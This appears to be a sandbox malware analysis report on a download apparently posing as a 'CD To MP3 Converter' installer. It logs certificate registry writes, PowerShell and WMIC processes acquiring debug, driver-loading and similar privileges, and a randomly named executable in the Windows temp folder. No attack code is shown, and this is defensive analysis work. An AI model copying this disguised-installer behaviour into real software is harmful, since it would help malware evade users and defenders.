Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\setup_NUyyEY7ilu.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3ME7O.tmp\setup_NUyyEY7ilu.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3ME7O.tmp\setup_NUyyEY7ilu.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
